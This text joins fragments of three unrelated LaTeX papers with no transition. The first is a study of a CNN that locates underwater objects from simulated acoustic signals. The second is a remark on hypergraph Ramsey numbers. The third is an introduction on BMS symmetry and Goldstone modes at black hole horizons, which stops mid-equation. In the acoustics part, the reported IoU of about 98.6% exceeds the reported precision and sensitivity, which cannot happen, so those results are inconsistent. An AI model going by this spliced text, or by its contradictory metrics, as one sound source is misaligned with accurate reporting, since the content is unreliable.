In the area of underwater acoustics, there is a variety of inverse problems, which, according to \cite{Collins}, are classified into two groups: remote sensing and source localization problems. In this paper we study a remote sensing problem, which seeks to estimate the location and shape of objects found in an aquatic environment; therefore, we propose a CNN model that can perform this estimation using signals received at eleven points, produced by the propagation of an acoustic signal through the medium from a point source.
\subsection{Synthetic Data Generation}\label{sec:dataset_generation}
We decided to use synthetic data to train the proposed CNN because no public dataset with the required characteristics could be found, and obtaining real data would be very expensive. For these reasons, we use the finite-difference method to simulate acoustic wave propagation in an underwater medium in order to generate 20,000 samples under different scenarios.
\subsubsection{Finite-difference method}\label{sec:finite_difference_method}
In order to generate synthetic data, we model the forward problem as the propagation of a plane acoustic wave in a 2D heterogeneous medium \cite{Yang-Hann, Lurton}. To this purpose, we solve the partial differential equation \eqref{eq:wave} using the finite-difference method under an extrapolation approach \cite{Heiner}; where $p$ is the pressure, $c$ is the wave propagation velocity in the medium, $s$ is the acoustic source, $x$ and $z$ are the spatial coordinates, and $t$ is the temporal coordinate.
\setlength{\arraycolsep}{0.0em}
\begin{eqnarray}\label{eq:wave}
\partial_{tt} p(x,z,t) & {}={} & c(x,z)^2 (\partial_{xx} p(x,z,t)+ \partial_{zz} p(x,z,t)) \nonumber\\
&&{+}\:s(x, z, t)
\end{eqnarray}
\setlength{\arraycolsep}{5pt}
The FDM requires discretizing the variables that appear in \eqref{eq:wave} and approximating the partial derivatives as combinations of these variables. To do this, the spatial coordinates $x$ and $z$ are divided into spacings of length $dx$ and $dz$, while the temporal coordinate is segmented into time intervals $dt$. In \eqref{eq:index_label}, the relation between continuous and discrete variables can be seen, where the superscript $n$ indexes timesteps, and the subscripts $i$ and $k$ are associated with $x$ and $z$, respectively.
\setlength{\arraycolsep}{0.0em}
\begin{equation}
\label{eq:index_label}
p_{i, k}^n = p(i dx,k dz,n dt)
\end{equation}
\begin{equation}
\label{eq:time_derivative}
\partial_{tt} p \approx (p_{i, k}^{n+1} - 2 p_{i, k}^n + p_{i, k}^{n-1})/dt^2
\end{equation}
\begin{eqnarray}\label{eq:x_derivative}
\partial_{xx} p & {}\approx{} & ((p_{i+3, k}^n + p_{i-3, k}^n)/90-3(p_{i+2, k}^n + p_{i-2, k}^{n})/20\nonumber\\
&&{+}\:3(p_{i+1, k}^n + p_{i-1, k}^n)/2-49p_{i, k}^n/18)/dx^2
\end{eqnarray}
\begin{eqnarray}\label{eq:z_derivative}
\partial_{zz} p & {}\approx{} & ((p_{i, k+3}^n + p_{i, k-3}^n)/90-3(p_{i, k+2}^n + p_{i, k-2}^n)/20\nonumber\\
&&{+}\:3(p_{i, k+1}^n + p_{i, k-1}^n)/2-49p_{i, k}^n/18)/dz^2
\end{eqnarray}
\setlength{\arraycolsep}{5pt}
In the approximation of the partial derivatives, we use three-point stencil for the temporal derivative and seven-point stencil for the spatial derivatives; their expressions are \eqref{eq:time_derivative}, \eqref{eq:x_derivative} and \eqref{eq:z_derivative}. From these equations, the variable $p$ is isolated at the timestep $n+1$ as a function of the previous timesteps, which are used to obtain the temporal evolution of the pressure.
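As an illustration of this extrapolation scheme, a minimal numpy sketch of one update step (assuming a common spacing $dx=dz$ and ignoring boundary treatment; the function and variable names are ours, not those of the original implementation):

```python
import numpy as np

W = (-49/18, 3/2, -3/20, 1/90)   # sixth-order second-derivative weights for offsets 0..3

def laplacian(p, dx):
    """Seven-point-stencil Laplacian of the pressure field (interior points only)."""
    lap = np.zeros_like(p)
    core = (slice(3, -3),) * 2
    for axis in (0, 1):
        lap[core] += W[0] * p[core]
        for off in (1, 2, 3):
            lap[core] += W[off] * (np.roll(p, off, axis)[core] + np.roll(p, -off, axis)[core])
    return lap / dx**2

def step(p, p_prev, c, s, dt, dx):
    """Explicit three-point temporal update: isolate p at timestep n+1."""
    return 2.0*p - p_prev + dt**2 * (c**2 * laplacian(p, dx) + s)
```

The stencil is exact for low-order polynomials, which makes it easy to sanity-check (e.g., $p\propto x^{2}$ gives a constant Laplacian equal to 2).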
Then, we model the propagation medium as a grid of points, where each point has a specific velocity; this is called the velocity model ($c_{i,k}$). By doing so, we can emulate the heterogeneity of the medium and build structures of different shapes within it, so that we can also measure the echoes produced by the structures when the wave impinges on them, as observed in \figref{subfig:wave_propagated}. The velocity values in the model are in the range of 0 m/s to 3000 m/s; in addition, we established the homogeneous medium as water, with a velocity equal to 1500 m/s.
Moreover, the dimensions of the velocity model and the variables $dx$ and $dz$ determine the physical dimensions of the simulated environment. Given that $dx$ and $dz$ are equal to one-fifth of the minimum wavelength, that is, 15 mm, and the model has a dimension of $256\times256$ points, the simulated space has a surface of 14.74 m$^2$. Additionally, we considered a total of 1800 timesteps, each one with a duration of 2.5 $\mu s$, which was determined with the Courant--Friedrichs--Lewy condition \cite{Heiner}.
Finally, an acoustic source is fixed at a point of the simulated space, as shown in \figref{subfig:wave_propagated}. This source produces a waveform equal to the first derivative of a Gaussian function \eqref{eq:signal_source}. We chose this function because it has a limited bandwidth. In \eqref{eq:signal_source}, the parameter $f_0$ is the maximum signal frequency, and it has a value of 40 kHz.
\begin{equation}
\label{eq:signal_source}
s^n = -2 (n-100) dt f_0^2 e^{-((n-100) dt f_0)^2}
\end{equation}
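A short sketch generating this source term (the exponent is taken negative so that the Gaussian envelope decays, as required for a bounded pulse):

```python
import numpy as np

dt, f0 = 2.5e-6, 40e3                          # timestep (s) and maximum frequency (Hz)
n = np.arange(1800)
t = (n - 100) * dt                             # pulse centered on timestep 100
s = -2.0 * t * f0**2 * np.exp(-(t * f0)**2)    # first derivative of a Gaussian
```

The extrema of the pulse fall at $|t|=1/(\sqrt{2}f_{0})$, i.e., about seven timesteps on either side of the center.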
\begin{figure}[tp]
\centering
\subfloat[]{%
\includegraphics[width=0.4\columnwidth]{./Imagenes/velocity_model.png}
\label{subfig:vel_model}
}
\subfloat[]{%
\includegraphics[width=0.4\columnwidth]{./Imagenes/velocity_model_estimated.png}
\label{subfig:wave_propagated}
}
\caption{ (a) Velocity model used in the simulation. (b) Propagation of the acoustic wave in the medium. Black inverted triangles represent measuring points while the green star represent the acoustic source.}
\label{fig:simulation}
\end{figure}
\subsubsection{Structure of samples}\label{sec:structure_samples}
Each individual sample in the dataset is an input-target pair, generated by the method described in \secref{sec:finite_difference_method} with a different velocity model. We randomly generate the velocity models (\figref{subfig:vel_model}) for each simulation, where each one has a different number of objects, in the range of 0 to 10. These objects are disk- or square-shaped and randomly distributed over the medium; they have a propagation velocity of 3000 m/s. Each of the models represents a target that is normalized and stored in a $256\times256$ array; its respective input consists of the pressure measurements made at 11 fixed positions of the simulated medium, as indicated in \figref{subfig:wave_propagated}. Each measurement starts at the 400th timestep and is stored in a $1400\times11$ array, rescaled to the range of $-50$ to $50$ units.
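A minimal sketch of this random model generation (the helper name, object-size range, and edge margins are illustrative assumptions; only the grid size, object count, shapes, and the two velocity values come from the text):

```python
import numpy as np

def random_velocity_model(n=256, seed=None):
    """Water background at 1500 m/s with 0-10 disk- or square-shaped 3000 m/s objects."""
    rng = np.random.default_rng(seed)
    c = np.full((n, n), 1500.0)
    for _ in range(rng.integers(0, 11)):           # 0 to 10 objects
        cx, cy = rng.integers(20, n - 20, size=2)  # keep objects away from the edges
        r = int(rng.integers(5, 20))               # radius / half-size in grid points (assumed)
        if rng.random() < 0.5:                     # disk
            yy, xx = np.ogrid[:n, :n]
            c[(xx - cx)**2 + (yy - cy)**2 <= r**2] = 3000.0
        else:                                      # square
            c[cy - r:cy + r, cx - r:cx + r] = 3000.0
    return c
```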
\subsection{Convolutional Neural Network Architecture}\label{sec:architecture_CNN}
The proposed CNN has an encoder-decoder architecture. This type of structure consists of two differentiated stages. The first stage, the encoder, extracts the most relevant features of the input signals and then encodes them in order to reduce their dimensions. The second stage, called the decoder, interprets the encoded information to produce an output with the desired characteristics. Each of these stages can be treated as an independent neural network, so in the following sections we detail each of them.
\begin{figure}[tp]
\subfloat[Encoder]{%
\centerline{
\includegraphics[width=0.4\textwidth]{./Imagenes/encoder.png}%
}
\label{subfig:encoder}
}\\
\subfloat[Decoder]{%
\centerline{
\includegraphics[width=0.4\textwidth]{./Imagenes/decoder.png}%
}
\label{subfig:decoder}
}
\caption{Expanded structure of the encoder and decoder implemented with convolutional layers.}
\label{fig:neural_network}
\end{figure}
\subsubsection{Encoder Structure}\label{sec:encoder_structure}
There is a wide range of encoder structures. Selecting one depends on the shape of the input data and the nature of the phenomenon that produces them \cite{Wu, Sorteberg, Badrinarayanan}. Since our input data are sequences, a traditional approach is to use recurrent layers, such as LSTM or GRU, to encode the information; however, the recent use of 1D and 2D convolutional layers has shown great potential for manipulating sequences. In addition, they require a lower computational cost, which is why we decided to implement an encoder architecture based on 1D convolutional layers (Conv1D).
The basic structure of the encoder is a sequence of four-layer blocks. Each block is composed of a convolutional layer, followed by a Batch Normalization (BN) layer, an activation layer (ReLU or Sigmoid), and, finally, a max-pooling layer. Each layer has its own hyperparameters: kernel size (k) and the padding method (same or valid) for the convolutional layers; window size for the max-pooling layers; and stride (s) for both. All the hyperparameters of the encoder are shown in \figref{subfig:encoder}.
Regarding the data dimension, the encoder receives an array of $1400\times11$ elements and generates, as an output, an array of $16\times16$ elements. This output contains essential information of the input signals.
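As an illustration of the dimension bookkeeping involved, the following sketch traces one assumed layer sequence (six `same`-padded Conv1D + MaxPool(2) blocks followed by one valid convolution; these are illustrative values, not necessarily the exact hyperparameters of \figref{subfig:encoder}) that maps the 1400-sample input down to a length-16 code:

```python
def pool_len(L, w=2, s=2):
    # output length of a valid max-pooling layer: floor((L - w) / s) + 1
    return (L - w) // s + 1

L = 1400
for _ in range(6):        # 'same' convolutions preserve L; each pooling stage halves it
    L = pool_len(L)       # 1400 -> 700 -> 350 -> 175 -> 87 -> 43 -> 21
L = L - 6 + 1             # one final Conv1D(kernel=6, padding='valid'): 21 -> 16
```

With 16 filters in the last convolution, the encoder output can then be read as the $16\times16$ code described above.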
\subsubsection{Decoder Structure}\label{sec:decoder_structure}
The decoder structure, similarly to the encoder, could be built in many ways, so its design has to consider the nature of both the input and the desired output. Since both the input and the output of the decoder are two-dimensional arrays, they can be processed as images; for that reason, 2D convolutional layers (Conv2D) are the main layers in the decoder implementation.
In addition to the Conv2D layers, we also use UpSampling2D and Batch Normalization (BN) layers. The Conv2D layers have almost the same hyperparameters as the Conv1D layers, with the only difference that their kernels are two-dimensional. Moreover, the UpSampling layers have two hyperparameters: window size and stride, both of which have values equal to 2 in the decoder implementation. The hyperparameter values for each layer are shown in \figref{subfig:decoder}.
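With window size and stride both equal to 2, each UpSampling stage doubles the spatial resolution; assuming four such stages, the $16\times16$ code reaches the $256\times256$ output resolution:

```python
size = 16
for _ in range(4):    # four UpSampling2D(size=2) stages, interleaved with Conv2D + BN
    size *= 2         # 16 -> 32 -> 64 -> 128 -> 256
```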
\section{Results}\label{sec:results}
In this section, we show the training results of the CNN models, as well as the metrics used to evaluate their performance.
\subsection{CNN Training}\label{sec:training_stage}
In this stage, we propose two additional models in order to compare their performance with that of the model proposed in \secref{sec:architecture_CNN}. These models have residual layers, similar to the one shown in \figref{fig:residual_layer}. From now on, the CNN described in \secref{sec:architecture_CNN} will be called InvNet, while the additional models will be called InvNet+1Res and InvNet+2Res, where the suffixes +1Res and +2Res refer to the number of residual layers added after each max-pooling layer in InvNet's encoder.
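The residual layer of \figref{fig:residual_layer} amounts to an identity skip connection around a shape-preserving convolution. The sketch below shows the idea; the internal composition of the residual branch (single convolution, final ReLU) is an assumption, since the exact layout is given only in the figure.

```python
import numpy as np

def residual_layer(x, w):
    """Residual layer sketch: out = ReLU(x + Conv1D_same(x)).

    The skip connection requires the convolution to preserve the input
    shape, which is why the kernel maps the channel count onto itself.
    """
    k = w.shape[0]
    pad = k // 2
    xp = np.pad(x, ((pad, pad), (0, 0)))
    f = np.stack([np.tensordot(xp[i:i + k], w, axes=([0, 1], [0, 1]))
                  for i in range(x.shape[0])])
    return np.maximum(x + f, 0.0)  # identity skip, then ReLU

x = np.random.randn(64, 16)
w = np.random.randn(3, 16, 16) * 0.1   # 'same' conv keeping 16 channels
y = residual_layer(x, w)
```

Because the residual branch only adds a correction to the identity path, stacking one or two such layers (the +1Res and +2Res variants) increases the parameter count without changing any tensor shapes in the encoder.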
\begin{figure}[!t]
\centerline{
\includegraphics[width=0.35\textwidth]{./Imagenes/residual_layer.png}}
\caption{Residual Layer}
\label{fig:residual_layer}
\end{figure}
The proposed CNNs were implemented with Python 3.6 on a server with an Intel Xeon E5-2620 CPU at 2.1 GHz, 128 GB RAM and two Nvidia Tesla K40 GPUs. The dataset described in \secref{sec:dataset_generation} was divided into training, validation and test sets with a ratio of 70~\%, 15~\% and 15~\%, respectively. The selected cost function was binary cross-entropy, and the optimizer was Adam with a learning rate of 0.0002, a first moment ($\beta_1$) of 0.5 and a second moment ($\beta_2$) of 0.99. Finally, all CNNs were trained with a batch size of 20 for 30 epochs; the accuracy and loss curves are shown in \figref{fig:curves}, where it can be seen that the models tend to over-fit around the 10th epoch. On the validation set, the CNNs reach accuracy and loss values around 97.6~\% and 0.064, respectively.
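The loss and optimizer settings reported above can be made concrete with a minimal NumPy sketch of binary cross-entropy and a scalar Adam update using the stated hyperparameters (learning rate 0.0002, $\beta_1=0.5$, $\beta_2=0.99$); the toy fitting problem is purely illustrative.

```python
import numpy as np

def bce(y_true, y_pred, eps=1e-7):
    """Binary cross-entropy, the cost function used for the binary masks."""
    p = np.clip(y_pred, eps, 1 - eps)
    return -np.mean(y_true * np.log(p) + (1 - y_true) * np.log(1 - p))

class Adam:
    """Adam with the paper's settings: lr=0.0002, beta1=0.5, beta2=0.99."""
    def __init__(self, lr=2e-4, b1=0.5, b2=0.99, eps=1e-8):
        self.lr, self.b1, self.b2, self.eps = lr, b1, b2, eps
        self.m = self.v = 0.0
        self.t = 0

    def step(self, theta, grad):
        self.t += 1
        self.m = self.b1 * self.m + (1 - self.b1) * grad
        self.v = self.b2 * self.v + (1 - self.b2) * grad ** 2
        m_hat = self.m / (1 - self.b1 ** self.t)      # bias correction
        v_hat = self.v / (1 - self.b2 ** self.t)
        return theta - self.lr * m_hat / (np.sqrt(v_hat) + self.eps)

# Toy check: fit a single logistic parameter to all-ones targets.
y_true = np.ones(20)                      # batch size 20, as in the training
theta = 0.0
opt = Adam()
for _ in range(200):
    p = 1.0 / (1.0 + np.exp(-theta))      # sigmoid output
    grad = np.mean(p - y_true)            # d(BCE)/d(theta) for a logistic output
    theta = opt.step(theta, grad)
```

The low $\beta_1$ of 0.5 (common in encoder-decoder and GAN-style training) shortens the gradient memory of the first moment, making the updates react faster to recent gradients than the default $\beta_1=0.9$ would.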
\begin{figure}[!b]
\centering
\subfloat[Accuracy]{%
\includegraphics[clip,width=0.4\columnwidth]{./Imagenes/Accuracy.png}%
\label{subfig:accuracy}
}
\subfloat[Loss]{%
\includegraphics[clip,width=0.4\columnwidth]{./Imagenes/Loss.png}%
\label{subfig:loss}
}
\caption{Curves obtained during the training stage of the three CNNs.}
\label{fig:curves}
\end{figure}
\subsection{Evaluation of the CNN}\label{sec:evaluation_stage}
After training, we proceed to evaluate and compare the performance achieved by each model. Since the outputs of the CNNs are binary masks, the following metrics will be used in the analysis: accuracy, precision, sensitivity, specificity and intersection over union (IoU).
The accuracy, precision, sensitivity and specificity are calculated with \eqref{eq:accuracy}, \eqref{eq:precision}, \eqref{eq:recall} and \eqref{eq:specificity}, where $tp$ is the number of true positive pixels; $tn$, true negatives; $fp$, false positives; and $fn$, false negatives. Each of these is counted over the pixels of the output image. While accuracy is a global metric that indicates the percentage of pixels correctly classified as solid objects or water, precision indicates the percentage of detected pixels that actually belong to objects. Similarly, sensitivity indicates the percentage of object pixels that are correctly detected (its complement being the percentage omitted), and specificity is the percentage of pixels correctly classified as water.
Additionally, IoU measures the percentage of overlap between the ground truth and the estimated velocity model, calculated according to \eqref{eq:IoU}. It gives an intuition of how well located and sized the objects are.
\begin{figure}[tp]
\centering
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/ground_truth_9991.png}%
\label{subfig:gt1}
}
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/ground_truth_9997.png}%
\label{subfig:gt2}
}
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/ground_truth_9999.png}%
\label{subfig:gt3}
}\\
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/estimated_9991.png}%
\label{subfig:es1}
}
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/estimated_9997.png}%
\label{subfig:es2}
}
\subfloat[][]{%
\includegraphics[clip,width=0.27\columnwidth]{./Imagenes/estimated_9999.png}%
\label{subfig:es3}
}
\caption{Images (a), (b) and (c) show the ground-truth velocity models, while images (d), (e) and (f) show the corresponding models estimated by InvNet.}
\label{fig:evaluation}
\end{figure}
\begin{equation}
\label{eq:accuracy}
\mathrm{accuracy} = \frac{tp + tn}{tp + fp + tn + fn}
\end{equation}
\begin{equation}
\label{eq:precision}
\mathrm{precision} = \frac{tp}{tp + fp}
\end{equation}
\begin{equation}
\label{eq:recall}
\mathrm{sensitivity} = \frac{tp}{tp + fn}
\end{equation}
\begin{equation}
\label{eq:specificity}
\mathrm{specificity} = \frac{tn}{tn + fp}
\end{equation}
\begin{equation}
\label{eq:IoU}
\mathrm{IoU} = \frac{|\,\mathrm{target} \cap \mathrm{prediction}\,|}{|\,\mathrm{target} \cup \mathrm{prediction}\,|}
\end{equation}
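All five metrics can be computed directly from a pair of binary masks; the sketch below implements \eqref{eq:accuracy}--\eqref{eq:IoU} with NumPy. The small $4\times4$ example masks are invented for illustration.

```python
import numpy as np

def mask_metrics(target, pred):
    """Pixel-wise metrics for binary masks.

    `target` and `pred` are boolean arrays of the same shape; object pixels
    are True, water pixels False.
    """
    tp = np.sum(target & pred)
    tn = np.sum(~target & ~pred)
    fp = np.sum(~target & pred)
    fn = np.sum(target & ~pred)
    return {
        "accuracy": (tp + tn) / (tp + fp + tn + fn),
        "precision": tp / (tp + fp),
        "sensitivity": tp / (tp + fn),
        "specificity": tn / (tn + fp),
        "iou": np.sum(target & pred) / np.sum(target | pred),
    }

# Example: a 2x2 object, predicted shifted by one column.
target = np.zeros((4, 4), bool); target[1:3, 1:3] = True
pred = np.zeros((4, 4), bool);   pred[1:3, 2:4] = True
m = mask_metrics(target, pred)
```

In this shifted-prediction example, half the object pixels overlap, so precision, sensitivity and IoU all drop well below accuracy, which stays high because of the large water background; this is the same asymmetry visible in \tabref{t:metrics}.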
These metrics were computed over the test set, which has 3000 samples, for each CNN, and the results are shown in \tabref{t:metrics}. It can be seen that all the CNNs reach high values of accuracy and specificity, but lower values of precision and sensitivity. These results indicate that they can detect the presence of objects but still have difficulty interpreting interference and echoes. In the case of the IoU metric, all the CNNs obtain high values, which indicates that all of them can properly estimate the localization and size of the objects. Although InvNet+1Res performs slightly better than the others, it has a higher computational cost than InvNet, as shown by the required number of parameters in \tabref{t:metrics}. Since InvNet combines good performance with low computational cost, it is the best of the three models.
\begin{table}[!b]
\caption{Performance obtained from the CNNs trained}
\begin{center}
\begin{tabular}{|l | l| l| l|}
\hline
\textbf{Models}&\textbf{InvNet}&\textbf{InvNet+1Res}&\textbf{InvNet+2Res} \\
\hline
\textbf{Accuracy} & 97.730\% & 97.853\% & 97.848\% \\
\hline
\textbf{Precision} & 75.880\% & 76.444\% & 76.359\% \\
\hline
\textbf{Sensitivity} & 64.692\% & 67.323\% & 67.285\% \\
\hline
\textbf{Specificity} & 99.131\% & 99.134\% & 99.130\% \\
\hline
\textbf{IoU} & 98.589\% & 98.718\% & 98.708\%\\
\hline
\textbf{Parameters} & 9M & 10M & 11M\\
\hline
\end{tabular}
\label{t:metrics}
\end{center}
\end{table}
Finally, we test InvNet under different situations and the results are shown in \figref{fig:evaluation}. They confirm what was mentioned above: the proposed CNN correctly locates most of the objects and estimates their shapes and sizes, but it presents some false positives, as observed in \figref{subfig:gt2} and \figref{subfig:es2}, as well as some omissions of objects, as seen in \figref{subfig:gt3} and \figref{subfig:es3}.
\section{Conclusions}\label{sec:conclusion}
In this work, a convolutional encoder-decoder architecture was proposed to estimate the velocity model of an underwater environment, managing to locate objects and approximate their shapes with a high IoU value of 98.59\%. Although the CNN presents good performance, it can still be improved, since in some cases it makes mistakes in detecting objects due to multiple echoes and shadows. These behaviors are reflected in the precision and sensitivity metrics, where the CNN obtains values of 75.88\% and 64.69\%, respectively.
Additionally, it is important to point out that the proposed CNN offers quick computation of a velocity model from acoustic signals, together with precision in object localization and size estimation. Since the proposed model was trained on a great variety of synthetic scenarios, we can infer that it may achieve similar results with signals from real scenarios. This is part of future work.
\section*{Acknowledgment}
The authors would like to thank the National Institute for Research and Training in Telecommunications (INICTEL-UNI) for the technical and financial support to carry out this work.
\subsection*{Remarks and acknowledgment}
As was brought to my attention by an anonymous referee, my construction for $r=3$ and $c=4$ is essentially the same as the one used in the proof of Theorem 1(ii) in \cite{CFR} for a different problem, the $4$-color Ramsey number of the so-called \emph{hedgehog}.
A hedgehog with body of order $n$ is a $3$-uniform hypergraph on $n+\binom n2$ vertices such that $n$ vertices form its body, and any pair of vertices from the body is contained in exactly one hyperedge, whose third vertex is one of the other $\binom n2$ vertices, a different one for each hyperedge.
It is easy to see that such a hypergraph is a Berge copy of $K_n$, and while their result, an exponential lower bound for the $4$-color Ramsey number of the hedgehog, does not directly imply mine, their construction is such that it also avoids a monochromatic $\B K_n$.
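To make the definition concrete, here is a short sketch constructing the hedgehog's edge set (the vertex labelling is an arbitrary choice): each pair of body vertices is joined to its own private spine vertex, so every hyperedge contains a distinct pair of body vertices, which is exactly the Berge-$K_n$ property.

```python
from itertools import combinations

def hedgehog(n):
    """3-uniform hedgehog with body {0, ..., n-1}: each pair of body
    vertices forms a hyperedge with its own private spine vertex."""
    edges = []
    spine = n  # next unused vertex label
    for u, v in combinations(range(n), 2):
        edges.append((u, v, spine))
        spine += 1
    return edges

E = hedgehog(5)  # 5 body vertices, C(5,2) = 10 hyperedges and spine vertices
```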
It is an interesting problem to determine how $R_{r}(\B K_n; c)$ behaves if $c\le \binom r2$.
The first open case is $r=c=3$, just like for hedgehogs.
\section{Introduction: BMS symmetry and Goldstone modes}
Black holes are fascinating objects in Einstein's theory of gravity. Even though they have been studied for a long time, we still do not understand them fully. One of their important properties is their very nature as thermal objects. Over the last few years, various efforts to understand this thermality have suggested that symmetries, their breaking and the associated Goldstone modes may play a fundamental role in this subject. In this paper we try to establish this connection between symmetry and the thermality of black holes, with some encouraging results.
Symmetry breaking phenomena are ubiquitous in nature. Across a large span of physical problems in particle physics, cosmology and condensed matter physics, not only symmetry itself but also its spontaneous breaking plays a crucial role in understanding low energy properties. Symmetries in nature are broadly classified into two categories. A symmetry which acts globally on the physical fields is called a global symmetry. Most importantly, for each global continuous symmetry there exists an associated conserved charge which encodes important properties of the system under consideration. Another class of symmetry, which acts locally on the fields and is generally known as gauge symmetry, makes the description of the system redundant. Unlike global continuous symmetries, gauge symmetries do not have associated non-trivial conserved charges \cite{AlKuwari:1990db}\cite{Karatas:1989mt}. The most striking property of a global continuous symmetry lies in its spontaneous breaking: if a global continuous symmetry of a system breaks spontaneously, an associated Goldstone boson mode emerges, whose dynamics characterises the underlying states of the system and their properties \cite{Weinberg:1996kr}.
On the other hand, breaking a gauge symmetry is inherently inconsistent with the theory under consideration.
In the present paper, we will try to understand the dynamics of the Goldstone boson modes associated with a special class of global symmetry arising at the boundary of a spacetime with a nontrivial gravitational background. The generic underlying symmetry of a gravitational theory is spacetime diffeomorphism, which is a set of local general coordinate transformations. Therefore, diffeomorphism can be thought of as a gauge symmetry of the gravitational theory. However, it is well known that a gauge symmetry in the bulk acts as a non-trivial global symmetry at the boundary. Therefore, even if the gravitational theory is formulated as a gauge theory, the theory of Goldstone modes can still be applicable, and information about the microscopic gravitational states may be extracted from the boundary global symmetry. Symmetries near the boundary of a spacetime have been a subject of interest for a long time \cite{Bondi:1962px}-\cite{Barnich:2013sxa}.
One of the popular and important examples of such a bulk-boundary correspondence is the well known global Bondi-Metzner-Sachs (BMS) group \cite{Bondi:1962px,Sachs:1962zza,Sachs:1962wk} of transformations. The BMS group is an infinite dimensional global symmetry group which acts non-trivially on the asymptotic null boundary of an asymptotically flat spacetime. The original study \cite{Sachs:1962zza} was carried out on this asymptotic null boundary. Subsequently, the analysis has been extended to another null boundary, namely the event horizon of a black hole spacetime \cite{Cai:2016idg}-\cite{Akhmedov:2017ftb}. The basic idea is to find the generators which preserve the boundary structure of the spacetime of interest under diffeomorphism. Usually one encounters two types of generators: supertranslations, associated with time reparametrization, and superrotations, associated with angular rotation. Over the years it has been observed that these generators can play a crucial role in understanding the horizon entropy of a black hole \cite{Iyer:1994ys}-\cite{Majhi:2015tpa}. Since then there has been a constant effort to understand these symmetries and their role in uncovering the microscopic structure of horizon thermodynamics. Although there has been no decisive progress so far, the motivation remains, and it has led to some recent attempts \cite{Strominger:1997eq}-\cite{Setare:2016qob}.
Moreover, in a series of remarkable papers \cite{Weinberg:1965nx}-\cite{Ashtekar:2018lor}, a deep connection between the Ward identities associated with the aforementioned BMS supertranslation symmetries and Weinberg's soft graviton theorem has been unraveled. It is argued that the soft gravitons are the Goldstone boson modes arising from the spontaneous breaking of the asymptotic symmetries. Hence an equivalence has been established between Weinberg's soft graviton theorem and BMS symmetries \cite{Campiglia:2015qka}. More interestingly, the same BMS transformation is shown to be closely related to the gravitational memory effect \cite{Strominger:2013jfa}\cite{Strominger:2014pwa}. Subsequently, the same effect has been shown to arise near the black hole horizon as well \cite{Donnay:2018ckb}.
In the present paper our focus will be on Killing horizons, specifically in the Rindler and Schwarzschild backgrounds. Those horizons behave like another null boundary on which the bulk diffeomorphism acts non-trivially in terms of a BMS-{\it like} global symmetry \cite{Koga:2001vq} \cite{Iofa:2018pnf}. Associated with this global symmetry on the horizon, the black hole microstates have been conjectured to be soft hairs, which are essentially the Goldstone boson modes associated with the symmetry broken by the macroscopic black hole state \cite{Dvali:2011aa}-\cite{Hawking:2016msc}. Although the appearance of Goldstone modes in the context of BMS symmetry is well known, their dynamical behavior has not been studied in a concrete way. It is believed that the dynamics of those modes should play a crucial role in understanding the microscopic nature of black holes. With this motivation, in the present paper we study the dynamics of those Goldstone modes following the standard procedure.
In order to clarify and better understand the methodology of our calculation, let us consider the emergence of the Goldstone boson mode for a well known U(1) invariant complex scalar field theory with the Lagrangian ${\cal L} = \frac{1}{2} (\partial_{\mu} \phi \partial^{\mu} \phi^{\dagger}) - V(\phi\phi^{\dagger})$.
A background solution such as $\phi_0 = c$ naturally breaks the U(1) symmetry, which transforms the vacuum as
\begin{eqnarray}
\phi_0 \rightarrow \phi_0' = e^{i \pi(x)} \phi_0 = c + i c \pi(x) + \cdots.
\label{R1}
\end{eqnarray}
Now we can identify $\pi(x)$ as the Goldstone boson field and compute the Lagrangian to quadratic order:
\begin{eqnarray}
{\cal L}_{\pi} &=& \frac 12 (\partial_{\mu} \phi_0' \partial^{\mu} \phi_0'^{\dagger}) - V(\phi_0'\phi_0'^{\dagger}) \nonumber \\
&=& \frac 12 \partial_{\mu} (c + i c \pi(x)) \partial^{\mu} (c-i c \pi(x)) - V(c^2 + \cdots) \nonumber \\
&=& \frac {c^2} {2} \partial_{\mu} \pi(x) \partial^{\mu} \pi(x) + \cdots.
\end{eqnarray}
The last expression is the leading order Goldstone boson Lagrangian associated with the broken U(1) symmetry (more details can be found in \cite{Peskin}). Throughout the following discussions, we will use this analogy to understand the dynamics of the Goldstone mode in the gravity sector.
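As a quick check of this textbook expansion, the quadratic kinetic term can be reproduced symbolically; in the sketch below a single coordinate $x$ stands in for all of spacetime, which suffices to track the derivative structure.

```python
import sympy as sp

x, c = sp.symbols('x c', positive=True)
p = sp.Function('p')   # the Goldstone field pi(x)

# Linearised broken vacuum phi_0' = c(1 + i pi(x)) and its conjugate
phi = c * (1 + sp.I * p(x))
phibar = c * (1 - sp.I * p(x))

# Kinetic part of L = (1/2) d_mu phi d^mu phi^dagger in one dimension:
# expands to (c^2/2) (d pi)^2, the canonical Goldstone kinetic term
kinetic = sp.expand(sp.Rational(1, 2) * sp.diff(phi, x) * sp.diff(phibar, x))
```

At the minimum of the potential the quadratic term from $V$ drops out, so the kinetic piece above is the whole quadratic Lagrangian, confirming that $\pi(x)$ is massless.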
In the first half of our paper we consider Rindler spacetime with a flat spatial section. In the second half we consider the asymptotically flat Schwarzschild black hole. Once we have a gravitational background, we first identify the global symmetry associated with the null boundary surface \cite{Cai:2016idg}-\cite{Akhmedov:2017ftb} \cite{Maitra:2018saa} by imposing appropriate boundary conditions. {\it The boundary conditions are such that the near horizon form of the metric remains invariant after the symmetry transformation}. However, macroscopic quantities such as the mass, charge and angular momentum characterizing the physical state of the black hole under consideration will change under those symmetry transformations. Such a phenomenon can be understood as a spontaneous breaking of the aforementioned boundary global symmetry by the black hole background. We therefore expect associated dynamical Goldstone boson modes. As mentioned earlier, in this paper we study the dynamics of those Goldstone boson modes, which may shed some light on the possible microscopic states of black holes.
\section{Rindler Background}
In this section we consider the simplest background and try to understand the symmetry breaking phenomenon described in the introduction.
The Rindler metric, in Gaussian null coordinates, is expressed as
\begin{equation}
ds^2 = -2 r \alpha dv^2 + 2 dv dr + \delta_{AB} dx^A dx^B~.
\label{BRM2}
\end{equation}
The Rindler horizon is located at $r=0$, and $\alpha$ is the acceleration parameter which characterizes the macroscopic state of the background spacetime. The symmetry properties of the horizon can be extracted from the following fall-off and gauge conditions:
\begin{eqnarray}
\pounds_\zeta g_{rr}= 0, \ \ \ \pounds_\zeta g_{vr}=0, \ \ \ \pounds_\zeta g_{Ar}=0~;\label{con}\\
